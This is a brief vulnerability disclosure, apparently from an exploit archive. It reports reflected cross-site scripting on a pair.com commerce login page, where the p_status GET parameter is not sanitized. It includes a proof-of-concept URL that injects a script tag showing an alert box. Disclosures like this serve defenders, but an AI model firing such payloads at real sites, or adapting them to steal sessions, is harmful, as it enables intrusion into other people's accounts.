commerce35.pair.com suffers from a cross site scripting vulnerability.
fefe9b8f7502d1abb958d5e6a58da6492ac244adee03f1d83521fd0367ae8226
Author: Max Dietz
Description: After logging in, the message displayed to the user is stored
in a GET request, on which no sanitizing is done
PoC:
https://commerce35.pair.com/inres/notify/index.php?action=loginform&p_status=<script>javascript:alert("HELLO");</script
>